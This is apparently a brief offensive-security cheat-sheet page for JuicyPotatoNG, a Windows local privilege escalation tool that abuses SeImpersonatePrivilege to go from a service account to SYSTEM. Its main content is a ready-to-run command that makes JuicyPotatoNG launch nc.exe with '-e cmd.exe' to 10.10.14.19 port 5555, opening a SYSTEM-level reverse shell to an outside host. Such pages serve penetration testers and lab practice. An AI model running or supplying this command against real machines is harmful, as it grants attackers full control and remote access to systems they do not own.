.. / JuicyPotatoNG
Star

Just another Windows Local Privilege Escalation from Service Account to System. Requires ‘whoami /priv’ SeImpersonatePrivilege.

Command Reference:

-t createprocess call: both (*)

-p <program>: nc.exe

-a <argument>: 10.10.14.19 5555 -e cmd.exe

Command:

JuicyPotatoNG.exe -t * -p "nc.exe" -a "10.10.14.19 5555 -e cmd.exe"

Extra code:

SeImpersonatePrivilege        Impersonate a client after authentication   Enabled

.. / JuicyPotatoNG Star if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }